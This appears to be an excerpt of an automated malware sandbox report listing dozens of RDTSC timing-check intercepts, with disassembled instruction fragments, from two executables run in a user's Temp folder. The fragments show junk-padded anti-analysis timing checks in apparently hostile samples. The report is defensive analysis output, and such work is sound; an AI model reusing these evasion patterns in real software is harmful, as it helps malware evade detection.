Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79AEEE second address: 79AF00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79B457 second address: 79B45B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79B881 second address: 79B89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B648E95FFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79B9F2 second address: 79B9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79B9F6 second address: 79B9FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79B9FE second address: 79BA36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F3B64CCE614h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b jmp 00007F3B64CCE611h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79BB52 second address: 79BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9608h 0x00000009 popad 0x0000000a push ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79BCCE second address: 79BCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE612h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79BCE4 second address: 79BCFC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F3B648E95F6h 0x00000012 je 00007F3B648E95F6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79BCFC second address: 79BD21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F3B64CCE60Ch 0x00000010 jng 00007F3B64CCE612h 0x00000016 jng 00007F3B64CCE606h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79EE03 second address: 79EE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 79EE07 second address: 79EE0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A0405 second address: 7A0410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3B648E95F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A0410 second address: 7A041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3B64CCE606h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A041A second address: 7A0442 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F3B648E9605h 0x00000011 jng 00007F3B648E95FEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A0442 second address: 7A0452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a ja 00007F3B64CCE606h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A3144 second address: 7A3157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F3B648E95F8h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A4893 second address: 7A4897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A4897 second address: 7A48A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3B648E95F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A48A3 second address: 7A48A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 7A67B2 second address: 7A67D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3B648E95FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007F3B648E95FBh 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD290F second address: FD291B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3B64CCE606h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD2BD5 second address: FD2BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD2BDD second address: FD2BEF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B64CCE606h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD2BEF second address: FD2C00 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD2F0D second address: FD2F13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD3061 second address: FD3075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3B648E95F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F3B648E95F6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD3075 second address: FD3086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD6133 second address: FD6137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD6137 second address: FD613D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FD6244 second address: FD6327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B648E9608h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jl 00007F3B648E960Ah 0x00000017 jmp 00007F3B648E9604h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jnl 00007F3B648E9608h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push ecx 0x00000029 jnc 00007F3B648E95F8h 0x0000002f pop ecx 0x00000030 pop eax 0x00000031 pushad 0x00000032 mov edi, dword ptr [ebp+122D2B9Eh] 0x00000038 jng 00007F3B648E95FCh 0x0000003e mov eax, dword ptr [ebp+122D29B2h] 0x00000044 popad 0x00000045 push 00000003h 0x00000047 mov cx, ax 0x0000004a push 00000000h 0x0000004c jmp 00007F3B648E9602h 0x00000051 push 00000003h 0x00000053 pushad 0x00000054 jmp 00007F3B648E9600h 0x00000059 mov edx, dword ptr [ebp+122D2A82h] 0x0000005f popad 0x00000060 push A016FA67h 0x00000065 push edi 0x00000066 je 00007F3B648E9606h 0x0000006c jmp 00007F3B648E9600h 0x00000071 pop edi 0x00000072 add dword ptr [esp], 1FE90599h 0x00000079 clc 0x0000007a lea ebx, dword ptr [ebp+12459D7Ah] 0x00000080 sbb cx, 7217h 0x00000085 push eax 0x00000086 push esi 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FCA365 second address: FCA388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3B64CCE617h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF405D second address: FF4061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4061 second address: FF407B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3B64CCE610h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF407B second address: FF407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF437D second address: FF4381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4381 second address: FF4391 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B648E95F6h 0x00000008 jl 00007F3B648E95F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4515 second address: FF454C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE613h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F3B64CCE619h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF454C second address: FF4551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4551 second address: FF456E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3B64CCE606h 0x0000000a jmp 00007F3B64CCE613h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF46CC second address: FF46D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF46D0 second address: FF46D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4C81 second address: FF4C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9602h 0x00000009 jc 00007F3B648E95F6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4C9E second address: FF4CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE613h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4CB7 second address: FF4CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4CBB second address: FF4CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Dh 0x00000007 jmp 00007F3B64CCE616h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007F3B64CCE606h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF4CF3 second address: FF4D1E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3B648E9609h 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F3B648E95F6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF51C2 second address: FF51C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF51C6 second address: FF51D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F3B648E95F8h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF531D second address: FF5355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B64CCE615h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F3B64CCE60Dh 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F3B64CCE60Dh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF5355 second address: FF5374 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B648E9609h 0x00000008 jmp 00007F3B648E95FDh 0x0000000d je 00007F3B648E95F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF5C82 second address: FF5C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3B64CCE612h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF5C9B second address: FF5CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3B648E9601h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jl 00007F3B648E95F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF5CBE second address: FF5CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF5CC6 second address: FF5CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF7644 second address: FF7655 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B64CCE608h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FF7655 second address: FF765B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FFFD59 second address: FFFD79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3B64CCE606h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F3B64CCE60Eh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jg 00007F3B64CCE606h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FFFD79 second address: FFFD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FFFD96 second address: FFFD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: FFFD9F second address: FFFDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100001B second address: 100003F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3B64CCE606h 0x0000000a pop edi 0x0000000b jmp 00007F3B64CCE619h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1001BBF second address: 1001BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3B648E95F8h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1001BD2 second address: 1001BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE619h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1001BEF second address: 1001C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c ja 00007F3B648E9600h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10028D4 second address: 10028D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1002D3D second address: 1002D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1002D41 second address: 1002D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1002D47 second address: 1002D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9600h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F3B648E95F6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1002DC8 second address: 1002DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1002DCE second address: 1002E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F3B648E95F8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push esi 0x00000024 jmp 00007F3B648E9609h 0x00000029 pop esi 0x0000002a mov dword ptr [ebp+122D1C9Eh], edi 0x00000030 xchg eax, ebx 0x00000031 jp 00007F3B648E9608h 0x00000037 push eax 0x00000038 push edx 0x00000039 jns 00007F3B648E95F6h 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1002E27 second address: 1002E3B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F3B64CCE60Eh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100466D second address: 1004673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1004673 second address: 1004679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1004679 second address: 100467D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100467D second address: 100469E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F3B64CCE606h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100469E second address: 10046A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 10058E7 second address: 10058EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1006636 second address: 100663A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 100663A second address: 1006640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1006412 second address: 1006416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	RDTSC instruction interceptor: First address: 1006416 second address: 100641A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
